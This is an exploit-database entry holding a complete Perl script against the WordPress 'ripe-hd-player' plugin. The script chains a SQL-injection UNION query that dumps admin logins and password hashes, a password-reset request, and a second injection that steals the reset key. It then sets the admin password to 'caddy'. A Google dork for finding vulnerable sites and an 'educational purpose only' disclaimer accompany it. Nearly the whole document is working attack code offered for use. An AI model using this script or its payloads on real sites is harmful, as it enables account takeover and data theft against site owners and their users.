Wordpress hd-player 0day Exploit

2013-05-16T00:00:00
ID 1337DAY-ID-20783
Type zdt
Reporter Caddy-Dz
Modified 2013-05-16T00:00:00

Description

Exploit for perl platform in category web applications

                                        
                                            #1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
#0     _                   __           __       __                     1
#1   /' \            __  /'__`\        /\ \__  /'__`\                   0
#0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
#1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
#0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
#1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
#0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
#1                  \ \____/ >> Exploit database separated by exploit   0
#0                   \/___/          type (local, remote, DoS, etc.)    1
#1                                                                      1
#0  [+] Site            : 1337day.com                                   0
#1  [+] Support e-mail  : submit[at]1337day.com                         1
#0                                                                      0
#1               #########################################              1
#0               I'm Caddy-dz member from Inj3ct0r Team                 1
#1               #########################################              0
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
  
####

# Exploit Title: Wordpress hd-player 0day Exploit

# Author: Caddy-Dz

# Facebook Page: http://www.facebook.com/Algerian.Cyber.Army

# E-mail: [email protected] 

# Download : http://www.mediafire.com/?62orbd63loc6us0

# Category:: webapps

# Google Dork: inurl:"/wp-content/plugins/ripe-hd-player

# Security Risk: High

# Tested on: Ubuntu

####

#

# Greets : 1337day Team , Exploit-ID Team , Algerian Cyber Army Team , KedAns-Dz , Kalashincov3 , The Unknown , Fawzi Cold-Fire 

# .. The Crazy 3D Team , Kha&mix , King Of Pirates , xDZx-Team ... and all algerian hackers .

#

# this was written for educational purpose only. use it at your own risk.

# author will be not responsible for any damage caused! user assumes all responsibility 

# intended for authorized web application pentesting only!





#####################################################################################################

# >>> sqli vulnerability discovered in the same plugin and posted ; http://1337day.com/exploit/20199

# this exploit was written to develope this vulnerability to get full access of the wordpress script 

# and bypassing the hash password into a constant password = caddy

#####################################################################################################



use IO::Socket;

use LWP::Simple;

use LWP::UserAgent;



system('cls');

system('color a');

  

  

if(@ARGV < 2)

{

print "[-]How To Use\n\n";

&help; exit();

}

sub help()

{

print "[+] usage1 : perl $0 site.com / \n";

print "[+] usage2 : perl $0 site.com /path/ \n";

print "[+] Note ! : do not use (http://) and leave space between the host and (/) \n or the path like the exemple";

}

  

print  "\n****************************************************\n";

print  "\n*                coded by Caddy-Dz                 *\n";

print  "\n*        email: islam_babia[at]hotmail.com         *\n";

print  "\n* Fb Page: http://facebook.com/Algerian.Cyber.Army *\n";

print  "\*****************************************************\n";

($Target, $path,$file_vuln, $sql_query,) = @ARGV;

 

my $file_vuln = "/wp-content/plugins/ripe-hd-player/config.php?id=-3";
my $sql_query = '+/**/UNION/**/+/**/SELECT/**/+1,2,concat(0x23,user_login,0x3a,user_pass,0x23),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+wp_users--'; 
my $url = "http://" . $Target . $path . $file_vuln . $sql_query;
print "\n wait!!! \n\n";

  

my $request   = HTTP::Request->new(GET=>$url);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);

my $response  = $useragent->request($request);
my ($username,$password);
if ($response->is_success) {

my $res   = $response->content;
if ($res =~ m/[#](.*):(.*)[#]/g) {

($username,$password) = ($1,$2);

print "[+] username and password :\n\n$username:$password \n\n";

}

else { print "[-] Error, Fail to get admin login.\n\n"; }

}

else { print "[-] Error, ".$response->status_line."\n\n"; 

}





my $activation = 'http://' . $Target . $path . 'wp-login.php?action=lostpassword';
sub post_url {

my( $activation, $formref ) = @_;

my $ua = new LWP::UserAgent(timeout => 300);
$ua->agent('perlproc/1.0');
my $get = $ua->post($activation, $formref );
}

my %param = ( 'user_login' => $username , 'wp-submit' => 'Get New Password' ); # you must change the parametre "Get New Password" if you're using other wordpress language version 

print post_url( $activation, \%param );


my $sql_activation = "http://" . $Target . $path . "wp-content/plugins/ripe-hd-player/config.php?id=-3+/**/UNION/**/+/**/SELECT/**/+1,2,concat(0x23,user_activation_key,0x23),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+wp_users--";
my $request3   = HTTP::Request->new(GET=>$sql_activation);

my $useragent = LWP::UserAgent->new();

$useragent->timeout(10);

my $response2  = $useragent->request($request3);
my ($key);
if ($response2->is_success) {

my $res2   = $response2->content;

if ($res2 =~ m/[#](.*)[#]/g) {

($key) = ($1);

print "[+] user activation key : \n\n$key \n\n";

}

else { print "[-] Error, Fail to get user key.\n\n"; }

}

else { print "[-] Error, ".$response->status_line."\n\n";

}


my $link2 = "http://" . $Target . $path . "wp-login.php?action=rp&key=" . $key . "&login=" .$username;
use strict;

sub post_url {

my( $link2, $formref ) = @_;

my $ua2 = new LWP::UserAgent(timeout => 300);



$ua2->agent('perlproc/1.0');



my $get2 = $ua2->post($link2, $formref );



if( $get2->is_success ){

print "\nPassword bypassed and changed to => caddy \n";

} else {

print status_line;



}

}
my %param = ( 'pass1' => 'caddy', 'pass2' => 'caddy', 'wp-submit' => 'Reset Password' ); # you must change the parametre "Reset Password" if you're using other wordpress language version 

print post_url( $link2, \%param );

#  0day.today [2018-01-02]  #